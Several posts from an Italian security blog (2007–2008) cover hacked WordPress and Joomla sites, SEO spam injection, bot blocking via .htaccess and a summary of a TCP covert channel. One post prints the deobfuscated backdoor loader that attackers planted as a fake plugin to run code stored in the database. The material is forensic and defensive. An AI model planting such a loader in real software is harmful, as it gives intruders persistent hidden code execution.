headermask image

header image

Cosa c’è di buono

8 Giugno 2007 – 15:14

Ben arrivati, o bentornati. Ecco alcune letture interessanti che si possono trovare in questo sito.
There are documents in english language, too.

Il mio libro Windows XP in sicurezza pubblicato da Apogeo come e-book gratuito. Leggetelo!

Un manuale sulla crittografia pratica, per Windows e Linux, con GnuPG, gratuito e leggibile on-line.

Per chi sta pensando di installare Linux, consiglio la lettura di Linux per Futili Motivi, Prima di installare Linux e Linux virus e antivirus, per sapere se Linux è la soluzione ai nostri problemi, e soprattutto cosa ci aspetta se decidiamo di installare.

Se poi comunque si decide per installare, e si sceglie Fedora, la mia distribuzione di riferimento, c’è una nutrita schiera di documenti a cui attingere:

Per chi vuole essere avvertito dell’arrivo di nuovi articoli può iscriversi al feed.

Se invece avete qualcosa da dirmi, qui trovate come contattarmi.

Buona lettura, e grazie per la visita.

Mario Pascucci | Varie (ed eventuali) | Comments (1)

E’ già iniziato

28 Agosto 2008 – 10:59

L’attacco a Joomla. Forse no, ma forse è già in corso. Nel post precedente, al termine, mettevo in guardia i webmaster che usano Joomla sulla prospettiva non proprio remota di andare a far compagnia ai webmaster con Wordpress compromesso.

Oggi ho provato qualche ricerca con termini ricorrenti nei link di spam, e indovinate un po’: decine di siti, anche italiani, che presentano link spam nascosti nella home page, iniettati in modo molto simile a quello usato in molti siti che impiegano Wordpress. Secondo la cache dei motori di ricerca, le pagine sono state visitate tutte dopo l’inizio di agosto, dal 10 in poi.

Spero di sbagliarmi, che siano siti compromessi da molto più tempo, e per ragioni differenti, e non l’inizio di una nuova piaga.

Ah, il Wordpress Autotest, anche se si lamenta che il sito non è basato appunto su Wordpress, rileva comunque parole chiave e stili CSS atti a nascondere contenuto, ossia funziona anche con Joomla, anche se con qualche incertezza. Dato che la strategia di spamming rimane la stessa, pur cambiando lo strumento, i test euristici rilevano le stesse stranezze di tutti gli altri siti compromessi.

Mario Pascucci | Information security, Wordpress | Comments (0)

Ridere fino alle lacrime, ed oltre

27 Agosto 2008 – 22:39

Per questo.

Ovviamente il tipo finisce sia nel mio lettore di feed che nel blogroll, dritto dritto e senza passare dal via.

Mario Pascucci | Fuori tema | Comments (1)

Compiti per le vacanze: la soluzione

27 Agosto 2008 – 12:27

Vista la nutrita schiera dei partecipanti e la massa di soluzioni che mi sono pervenute (una sola, completamente fuori strada), qui di seguito trovate la soluzione all’indovinello estivo.

Il primo passo era di reperire il file da qualche parte, ed a questo qualcuno c’è arrivato, bravo Nanni. Era sufficiente cercare in Google una delle stringhe mostrate nell’immagine. Ad esempio basta inserire la stringa lpa1zxy (la terza in alto nell’immagine) in Google, ed il primo risultato è quello voluto. Notare che i siti che si ottengono dalla ricerca sono stati compromessi in vari modi, e probabilmente lo sono ancora. I bug e le vulnerabilità su cui si basano le intrusioni sono noti ormai da anni e se un webmaster non sa fare il suo lavoro è un suo problema.

Reperito in file, rimane da capire cosa stiamo guardando. A prima vista sembra qualcosa di cifrato con un algoritmo piuttosto banale, tipo una codifica Base64, o una ROT-13 (o cifrario di Cesare modificato).

Invece, e qui si mostra ancora una volta la genialità del mentecatto, si tratta di normale codice PHP, in cui le stringhe apparentemente codificate sono soltanto dei commenti. Eliminandoli e ricostruendo il codice “attivo” il risultato è un misero:


<?
$f = create_function("",strrev(get_option("wordpress_options")));
$f();
?>

Tutto qui. Questo è quello che viene inserito come plugin nei blog basati su Wordpress violati dal mentecatto. Il plugin non fa altro che scaricare dal database, nella tabella delle opzioni di Wordpress, un record iniettato contenente il vero plugin, e lo esegue. Il plugin ha varie funzioni, principalmente quella di controllare lo user agent dei visitatori e presentare i link di spam se è il GoogelBot a visitare il sito, mentre se è un normale visitatore proveniente da una ricerca per le pillole a basso costo lo reindirizza sul sito della farmacia. Poi ha anche altre funzioni, tipicamente di autodifesa, ed è capace di rimettersi in sesto se il blog viene aggiornato o viene fatto un tentativo di pulizia senza usare le maniere forti. Ne esiste una seconda variante, assolutamente identica come codice PHP attivo, sono soltanto differenti le finte stringhe cifrate, cioè i commenti.

Ne ho parlato e scritto fino alla nausea. Il mentecatto (i mentecatti, le infezioni sono in più varianti, questa è la più diffusa) è uno che ci capisce, non un wannabe. I blog Wordpress infetti sono ancora al loro posto, mentre i proprietari dormono sonni tranquilli. Qualcuno ha pure fatto il test, ha visto i risultati e ha continuato come se niente fosse. Se ritiene che qualche link di spam non sia poi un gran problema, beh, in bocca al lupo.

Lo scopo dell’indovinello era quello di verificare le capacità di analisi, assolutamente necessarie per ricostruire gli eventi in caso di intrusione in un sito web. Analizzando questo file, che nei siti compromessi non ha mai l’apparenza di un file PHP, sono riuscito a trovare dove era nascosto il codice che presentava i link e che deviava le visite. Da lì ho scovato le altre iniezioni di dati nel database, ad esempio la cache dei link spam, e la modalità di reinfezione, o di sopravvivenza ad un upgrade. Peccato, una occasione persa, per tutti. Probabilmente sono io che non ho capito bene in cosa consista la Computer Forensics.

Al prossimo indovinello. Ah, a proposito, qualcuno usa Joomla? Beh, sappiate che state per andare in massa a fare compagnia a chi ha Wordpress in versione “farcita”. Alcuni blog Wordpress compromessi mostrano come link di spam siti che fanno uso di Joomla, naturalmente “farciti” con una variante prontamente sviluppata dal mentecatto. Naturalmente è sufficiente un upgrade alla versione corretta per mettersi al riparo, ma certamente non possiamo fare a meno di quel plugin bellissimissimo che con la nuova versione non funziona, e poi il tema stiloso non si vede bene, eh.

Tranquilli, il mentecatto si fa molti meno problemi. A lui il vostro sito piace com’è. Farcito.

Mario Pascucci | Computer Forensics, Information security, Wordpress | Comments (3)

Di classifiche e rantoli, parte II

26 Agosto 2008 – 10:59

Come promesso, ho iniziato ad indagare su come riprendere il controllo di come vengano usati i contenuti offerti in questo sito da innumerevoli “servizi di pubblica utilità”. Ho messo le virgolette perché ho la sensazione, ed alcuni fatti me ne danno ragione, che della pubblica utilità non gliene importi granché.

Il primo passo è stato di installare un sistema di rilevazione delle visite, che mi permette di scoprire chi, da dove e come accede al sito e soprattutto ai feed.

Ho appurato che molti visitatori automatizzati (crawler, robot e spider) non rispettano il contenuto del file robots.txt che, secondo le regole che dovrebbero rendere più civile la convivenza su Internet, dovrebbe indicare a questi visitatori automatizzati dove possono ficcare il naso e dove non possono. Certo, nessuno ne fa un obbligo, si tratta di autoregolarsi. Ma, visto appunto che le regole servono a chi non sa regolarsi, quando il totale disprezzo della proprietà altrui è evidente, si inizia a prendere provvedimenti forti.

Altro dato che per quanto mi riguarda è atteso, ma dovrebbe far saltare sulla sedia chi ignora le più elementari regole per la sicurezza del proprio sito/blog, è rappresentato dal numero di spider in cerca di rogne. In meno di venti ore di raccolta dei dati, su 495 crawler/spider che hanno visitato il sito, 192 contenevano nello User Agent la stringa “libwww-perl”. E il sistema colleziona solo chi accede a pagine “regolari” del sito, non cataloga ad esempio chi tenta di accedere alle pagine “private” (tipo quella di modifica dei temi, o quella di amministrazione, o a quella dei plugin), per cui il numero di accessi preludio ad una intrusione è molto più alto.

Per chi non ne fosse al corrente, gran parte dei mentecatti in cerca di siti da violare usa script fatti in Perl, un linguaggio nato con tutt’altro scopo. Quando uno script Perl accede ad un server web si identifica con quella stringa particolare, appunto “libwww-perl”.

I tentativi fatti da questi script vanno dalla semplice lettura del feed, al tentativo di leggere il file /etc/passwd, ad innumerevoli tentativi differenti di RFI. Ne ho già parlato, ed i principali bersagli sono plugin affetti da problemi di sicurezza.

Il passo successivo, sperimentale, è stato di aggiungere qualche riga al mio file .htaccess, queste per la precisione:


RewriteEngine  on
RewriteCond %{HTTP_USER_AGENT}   ^NomeSpider.*
RewriteRule .+   -   [F]

con il seguente effetto: se il sito viene visitato da qualcosa il cui user agent ha un identificativo che inizia con la stringa NomeSpider, il visitatore ottiene in risposta un 403-Forbidden al posto di qualsiasi pagina contenuta nel sito. In questo modo si chiude in faccia la porta in modo selettivo agli spider “maleducati”.

Naturalmente è una misura di poco valore, per il semplice fatto che un mentecatto competente può in pochi secondi cambiare la stringa identificativa del proprio spider, rendendo inefficace la misura, strategia che ho visto con i miei occhi in molti script “pronti per l’uso” reperiti in Rete per fare birbonate: in qualcuno lo user agent è una stringa casuale, in altri è scelto a caso fra stringhe di browser normali, quali Firefox, Konqueror, Internet Explorer, Safari e via così.

Lo stesso Wordpress Autotest opera in questa maniera, per poter attirare in trappola il codice malevolo iniettato nei blog colpiti: si presenta con differenti user agent allo scopo di costringere il malware a rivelarsi.

In ogni caso la regola può essere fatta anche con l’indirizzo IP dello spider, e questo può essere molto più efficace: al visitatore non basta cambiare il proprio user agent, deve proprio cambiare punto di accesso alla Rete, cosa non proprio banale. Ma, sempre parlando di “libwww-perl”, gli indirizzi IP da cui provengono le scansioni sono quasi tutti di fornitori di accesso Internet a privati, tradotto: sono computer di “guidatori sopra la media” compromessi ed usati dal nostro amico mentecatto, o da un suo affine, sempre mentecatto. Quindi anche l’inserimento di un indirizzo IP è una misura poco efficace, se vogliamo contrastare un possibile attacco mirato a violare il sito. Rimane efficace per “educare” crawler e spider poco rispettosi, appartenenti a società sempre a caccia di informazioni di qualsiasi genere da rivendere.

Riguardo alle stranezze di una certa classifica, non sono l’unico ad avere delle perplessità.

Due parole ancora per spiegare meglio il mio punto di vista. Sulle classifiche ho cambiato idea, non ho nessun problema a dirlo. All’inizio pensavo che fossero uno strumento utile a far conoscere il proprio sito e soprattutto a raggiungere meglio i possibili interessati agli argomenti che tratto. A distanza di molto tempo (informaticamente parlando), il risultato è non solo deludente, ma è evidente il vantaggio di chi conosce i meccanismi della classifica (quale che sia) e di come si faccia di tutto per scalare posizioni usando tutti i trucchi possibili ed immaginabili per “dopare” la propria posizione. La responsabilità non è della classifica e di chi la gestisce, ma se di un responsabile avete bisogno, guardatevi allo specchio e chiedetevi se non sia ancora una volta il solito vizietto di voler fare i furbetti a tutti i costi per primeggiare con poca fatica.

Ritengo tutto ciò, nel mio specifico caso, lesivo della mia immagine e del mio lavoro. Per cui mi opporrò in ogni maniera ad essere incluso in classifiche che vengono abusate dagli stessi membri, al solo scopo di rimediare qualche click in più, in cambio di nulla.

Riferimenti

Mario Pascucci | Information security, Wordpress | Comments (2)

Wordpress Autotest: v1.11 with english translation, too

25 Agosto 2008 – 15:01

If you suspect an intrusion in your Wordpress blog, or spam link injection, or you feel that your blog is 0wned, you can do this check.

Instructions and results are in English language. Some documentation about Wordpress spam injection and redirection is here.

Mario Pascucci | ...english, too!, Information security, Wordpress | Comments (0)

Repliche estive: “Un malware veramente cattivo #1: comunicare senza comunicare” (9 dicembre 2006)

25 Agosto 2008 – 05:00

La ricercatrice Joanna Rutkowska ne sa veramente una più del diavolo. Naturalmente il suo blog è fra i miei preferiti. Lo aggiorna raramente, ma ogni suo scritto vale ogni singolo bit impiegato. Questo articolo, scritto quasi due anni fa, prendeva spunto dalla presentazione di un suo progetto, realizzato e funzionante, di cui avevo parlato già in una differente occasione.

Joanna nel frattempo ha prodotto molte altre cose, tutte estremamente interessanti, nel campo della sicurezza e dei malware. Uno dei suoi punti di vista che condivido completamente è che l’uso della virtualizzazione come strumento di sicurezza è una falsa soluzione. Ma questa è un’altra storia. Buona lettura.

Un malware veramente cattivo #1: comunicare senza comunicare

Ogni malware ha necessità di comunicare, vuoi per avvertire casa di essere arrivato, vuoi per fare il suo sporco lavoro. Per questo motivo, in mancanza di alternative, si può sempre agire dall’esterno del computer sospetto di essere compromesso: lavorando di sniffer è di solito possibile vedere il traffico anomalo generato dal malware per comunicare con l’esterno.

Ma… immaginate un metodo di comunicazione che non sia rilevabile con un normale sniffer: niente trucchi elettronici o elettrici, la comunicazione c’è, ma non si vede.

Presentiamo i nostri attori:

  • A: il computer compromesso con dentro un malware di quelli cattivi.
  • B: il computer di chi ha spedito il malware ed ora sta aspettando i suoi messaggi.
  • C: il computer del detective che deve scoprire cosa comunica il malware.
  • X: un computer qualsiasi su Internet.

A comunica in protocollo TCP con X. B si trova in qualche punto fra A e X, e riesce a vedere il traffico di rete fra i due. C si trova anche lui fra A e X, ma anche fra A e B, quindi se A manda un qualsiasi pacchetto IP a B, C lo intercetta immediatamente e può rilevare il traffico anomalo.

Alla fine fra A e B non circola un solo pacchetto, solo fra A e X, ma B ha ricevuto tutti i dati inviati da A.

Come può essere accaduto?

Usando un Passive Covert Channel della nostra incredibile Joanna Rutkowska.

Nell’intestazione di ogni pacchetto TCP ci sono dati per il funzionamento del protocollo, sotto forma di bit. Ognuno di essi ha un significato ben preciso, e non può avere valori arbitrari. Inoltre non si possono usare trucchi come accodare dei byte in più ad ogni pacchetto, perché sarebbero immediatamente rilevati.

Un solo blocco di bit può avere in teoria un qualsiasi valore ed essere valido: il campo dell’ISN (Initial Sequence Number).

La comunicazione avviene in questo modo:

  1. A apre la comunicazione con X. Il malware annidato al suo interno intercetta i pacchetti TCP di tipo SYN in uscita e sostituisce l’ISN originale con quello generato da lui.
  2. X riceve i pacchetti e risponde normalmente.
  3. B, che legge in modo passivo il traffico fra A e X, estrae i dati inviati da A in tutti gli ISN dei pacchetti TCP SYN, li riassembla, e legge la comunicazione.
  4. C non vede nulla di strano, solo A che comunica con X, e basta.

I limiti sono che B non può inviare dati al malware e che il malware può inviare dati al ritmo di soli tre byte per ogni pacchetto TCP SYN inviato dal computer compromesso. L’integrità della comunicazione è assicurata dal meccanismo di funzionamento del protocollo TCP stesso: se dovesse andare perso un qualsiasi pacchetto, il computer compromesso lo ritrasmetterebbe automaticamente perché richiesto dal protocollo stesso. Dato che B si trova fra A e X, se X riceve un pacchetto, lo riceve anche B. Quindi anche l’integrità è assicurata.

Per evitare di essere scoperta troppo facilmente, la comunicazione usa anche una cifratura derivata dal DES, che garantisce anche una relativa casualità nei valori di ISN forgiati. In questo modo si evita di insospettire per l’inevitabile regolarità dovuta alla presenza di dati sensati in un posto dove non dovrebbero essercene.

In conclusione: abbiamo la possibilità di creare un canale sicuro e coperto con il computer compromesso, senza scambiare direttamente neanche un singolo pacchetto.

La stessa tecnica si può applicare sfruttando altri elementi di un qualsiasi altro protocollo, ad esempio, citando Joanna, i cookie http, oppure i pacchetti TCP di tipo SYN/ACK, utili se ad essere compromesso è un server.

Oggi

C’è poco altro da aggiungere. Joanna nella presentazione ha mostrato anche come accorgersi che quello che dovrebbe essere casuale non lo è, chiudendo il cerchio, come dovrebbe fare ogni hacker degno di questo appellativo.

Per il resto, gli attuali malware a grande diffusione sono tutt’altro che sofisticati, preferendo colpire la massa con poco sforzo piuttosto che spendere energie per colpire pochi ma buoni. Tanto, come ho più volte affermato, a chi crea virus interessa sfruttare le risorse del computer colpito, creando botnet, e niente altro. Malware più sofisticati sono l’eccezione, e si preferisce utilizzare la legge dell’ottanta/venti: il venti per cento dello sforzo necessario a creare un malware realmente pericoloso è sufficiente a creare un malware che colpisca l’ottanta per cento dei computer del pianeta. Perché pagare di più?

Mario Pascucci | Information security | Comments (0)

Di classifiche, pagerank, rantoli e lamenti

22 Agosto 2008 – 14:35

I numeri. Dicono che non mentano.

Da gennaio 2007 a oggi il sito che leggete ha ricevuto ben 61, dico, 61 visite indirizzate da una nota classifica di blog italiani, su un totale di 129.000, 51.000 da referer. Dopo che nella settimana a cavallo fra dicembre 2007 e gennaio 2008 è circolato un ASCII-art con due bicchieri dove ogni “pixel” era un link ad un blog, le visite al sito sono aumentate da 1500 a oltre 2100 a settimana, in media. Oggi sono in media 2100-2500, sempre a settimana, tranne in questo periodo, notoriamente di stasi.

Per la diffusione di questo sito è stato infinitamente più efficace un post definito “spammatorio” che l’iscrizione a tre differenti classifiche di blog italiani. Le altre due classifiche hanno condotto qui rispettivamente 72 e 32 visite, sempre nello stesso periodo di 18 mesi. Technorati ne ha portate qui 40.

I numeri parlano molto chiaro: per le classifiche questo sito non vale niente (o quasi), quindi, secondo loro, se siete qui e leggete quello che scrivo state perdendo tempo prezioso.

Alt, fermi. Frenate gli spruzzi di adrenalina e le scariche di ormoni. Non sto dicendo che le classifiche sono inutili. Sto dicendo che per un sito come il mio sono non solo inutili, ma dannose. Ed il mio è un sito da poco. Chiaro?

I contenuti mi pare ci siano, ma sono molto di nicchia. Poi raramente parlo dei fatti miei, anzi, quasi mai. E’ abbastanza normale che il numero di visitatori sia così esiguo, e parimenti il numero di citazioni. Fra l’altro, visto che il famigerato e tenuto Pagerank si basa appunto sulle citazioni, anche questo parametro di valutazione si mantiene su valori piuttosto bassi.

Quello che mi fa molto pensare, ed in un certo senso mi porta a ritenere inutili nel mio caso certi strumenti, sono le continue manipolazioni manuali che vengono fatte agli algoritmi di calcolo del punteggio in classifica. Gli stessi che stilano la classifica dichiarano da più parti che periodicamente il sistema di calcolo della classifica viene rivisto e corretto. Ecco il motivo dei salti improvvisi: pagerank che crollano da 5 a 3 in 24 ore, 600 posizioni in meno in classifica nel giro di una settimana, cose così.

Naturalmente, se avessi toccato qualcosa nel sito, potrei sospettare di aver causato io stesso simili sconvolgimenti tellurici, ma dato che l’unica cosa fatta è pubblicare roba di mia produzione, la cosa è frustrante, a dirla tutta.

Per questo ho preso una decisione: farò in modo di “escludermi” dalle classifiche, in modi e tempi che devo studiare. Il motivo è molto semplice: pensando a queste cose perdo la concentrazione ed invece di occuparmi dei contenuti mi faccio il sangue amaro per cose su cui non solo non ho il controllo, ma neanche la chiave di lettura.

L’altra ragione, per cui ritengo lo strumento classifica stilato in questo modo pressoché inutile per il mio caso, è che non ne ricavo reali indicazioni sul gradimento di quello che offro ai lettori. E’ infinitamente più utile uno strumento come Google Analytics, che mi permette di vedere le cose più cercate, più lette, i tempi ed i modi di accesso al sito, se e quando vengono letti certi documenti, insomma una valutazione molto più granulare e, se vogliamo, impietosa rispetto ad una classifica. Se scrivo stupidaggini o cose inutili, la gente anche se arriva sul sito ci rimane ben poco.

Perché vi dico tutto questo? Non lo so. Sento il bisogno di dirlo a qualcuno, insomma. E poi chissà che qualcuno di voi che mi legge non abbia un suggerimento o una idea migliore. Io sono un po’ a corto, in effetti.

Mario Pascucci | Pensieri sparsi | Comments (0)

Flash Player plugin: attenti alle versioni a pagamento.

20 Agosto 2008 – 05:00

Stavo leggendo la mia posta, quando lo sguardo mi è caduto nella riga in alto con gli annunci di Google. Ecco il frammento della pagina:

Cliccando sul link si arriva a questo sito:

Potevo resistere? Naturalmente no. Ecco i risultati dell’indagine.

Keep Reading »

Mario Pascucci | Information security | Comments (1)

Owned Wordpress: aggiornare a 2.6 o 2.6.1 non risolve

19 Agosto 2008 – 05:00

Proseguendo nella mia solitaria indagine sulle molteplici intrusioni in blog basati su Wordpress non aggiornati, ho esaminato, come ho già fatto qualche tempo addietro, gli effetti di un aggiornamento prima a Wordpress 2.6, poi alla versione 2.6.1, fresca di forgia.

Passando alla versione 2.6 l’unico indizio che ci sia qualcosa di poco pulito è il contatore degli amministratori nell’elenco degli utenti.

Come potete notare nella figura sopra, c’è un solo utente, amministratore, visualizzato nell’elenco, ma il conteggio ne riporta 2.

Disabilitando Javascript e ricaricando la pagina si svela l’arcano: appare immediatamente il secondo amministratore dal nome WordPress, nella colonna “Nome” mostra solo tre puntini. Esaminando il codice HTML della pagina si scopre lo script di “cloaking” dell’amministratore abusivo, di cui avevo già parlato.

Nessun altro indizio evidente mostra che il blog è compromesso ed in mano ad altri. L’unica possibilità è data da una accurata analisi di tutto quanto costituisce il blog stesso, database compreso, naturalmente sapendo dove e cosa cercare.

Aggiornando alla versione 2.6.1 le cose cambiano, ma non di molto. Solo la prima volta che si entra nella gestione dei plugin si ottiene il messaggio mostrato qui sotto:

Per me e per chi ha dimestichezza con Wordpress questi messaggi sono il chiaro indice che qualcosa non va, ma per la maggior parte dei tenutari di blog probabilmente non hanno molto significato. Il problema è che i messaggi appaiono solo la prima volta che si entra nel pannello di gestione plugin del blog dopo l’aggiornamento, per non comparire mai più.

Ai fini dello sradicamento dell’intrusione non si ottiene la pulizia completa. Occorre ancora intervenire a mano, e non è sufficiente cancellare l’amministratore abusivo ed i plugin fasulli. Nel blog c’è sicuramente ancora roba nascosta, file modificati, residui nel database. L’incursore ha potuto leggere le credenziali di accesso al database stesso, in chiaro nel file wp-config.php, ed ha molte frecce al suo arco:

  • i file camuffati, inseriti ovunque, potrebbero essere shell remote, capaci di modificare a piacere i file dell’installazione, aggiungerne altri, cancellarli, ecc.
  • i file del tema e dei plugin potrebbero essere stati modificati per eseguire pezzi di codice PHP a comando
  • I falsi plugin sono ancora presenti, se il webmaster non li ha cancellati
  • nel database c’è ancora una copia di riserva della remote shell, e la cache dei link di spam

I primi tre punti sono porte aperte alla “reinfezione” del blog, l’ultimo è semplicemente fatica in meno per l’incursore.

Ho trovato almeno tre blog in rete (sì i proprietari sono stati avvertiti) aggiornati alla versione 2.6 che non mostravano più il comportamento di forgiare la pagina a seconda del visitatore (utente normale o GoogleBot), ma avevano centinaia di link spam nascosti in fondo ai post nella home page. Ipotizzo, cosa da verificare ma verosimile, che il proprietario abbia aggiornato ignorando di essere vittima dell’intrusione, ed i file corrotti dall’intrusione siano stati sovrascritti, cosa che ha fatto perdere al mentecatto la possibilità di inserire link spam a piacere senza intervenire direttamente sul blog. Naturalmente, il nostro amico non si è perso d’animo: ha immediatamente approfittato del proprio account amministratore abusivo ed ha modificato i post in prima pagina inserendo i link spam all’interno di un blocco HTML con uno stile utile a nasconderli ai visitatori umani (ad esempio con style="display:none", oppure con style="overflow:hidden;width:0;height:0"). Oppure, anche dopo aver perso anche l’amministratore abusivo, scoperto e cancellato dal webmaster più attento, potrebbe essere in grado di accedere il database MySQL dall’esterno e modificare a mano i post per accodare i link spam. Lo può fare perché ha potuto leggere le credenziali di accesso al database, contenute in wp-config.php. Non dovrebbe essere possibile farlo dall’esterno, i servizi di hosting non dovrebbero permettere l’accesso al server database a chiunque. Se però nel blog vi sono ancora i file modificati dall’incursore per eseguire codice PHP a comando, come mostrato qui, per il mentecatto è un gioco da ragazzi inserire un paio di righe di PHP da eseguire al volo per modificare il record nel database relativo al post ed aggiungere i link spam.

Il risultato è che, pur dopo tutti gli aggiornamenti, se avevamo il blog infetto e non abbiamo usato le maniere forti, saremo daccapo in poco tempo. Nel frattempo, il mentecatto non sta con le mani in mano e molto probabilmente sta correndo ai ripari: a breve l’aggiornamento a Wordpress 2.6.x potrebbe non essere più efficace per scoprire l’intrusione.

L’unica cosa che, ironia della sorte, potrebbe alla fine porre fine all’abuso del nostro blog da parte del mentecatto è il crescente numero di servizi di indicizzazione e motori di ricerca che adottano politiche di esclusione del siti compromessi. Quando il nostro sito verrebbe escluso da tutti (Google, Technorati, FeedBurner, ecc.), il mentecatto non saprebbe più cosa farsene, e lo lascerebbe al suo destino. Certo, a quel punto il nostro blog sarebbe un rottame: invisibile da Internet, non più indicizzato dai principali motori di ricerca e aggregatori, saremmo come la voce che grida nel deserto. O peggio potrebbe essere venduto a qualche organizzazione dedita al phishing, a cui non importa il posizionamento del sito nei motori di ricerca.

Uscire da quello stato di limbo non è molto facile, e molto tempo occorre per recuperare credibilità agli occhi degli innumerevoli siti di indicizzazione. E’ meglio intervenire prima possibile.

Mario Pascucci | Information security, Wordpress | Comments (3)

  • Licenza

    Creative Commons License
    Questo sito e tutti i suoi contenuti sono pubblicati sotto una Licenza Creative Commons, quando non diversamente specificato.

    Per altri usi, basta contattarmi.

  • Argomenti

  • Archivio mensile

  • Spazio offerto da

  • Alzate d'ingegno

    D: invece di usare il solito software pirata, hai provato OpenOffice?

    R: ho provato più volte a scaricarlo da Emule, ma ha sempre problemi.

  • Amici

  • Buonumore

  • Da leggere

  • Sicurezza e computer

  • Adesivi


    Fedora user
    TuxMobil - Linux on Laptops, Notebooks, PDAs and Mobile Phones
    Linux On Laptops
    Spam Karma 2
    TuxFeed
    Bloggers' Rights at EFF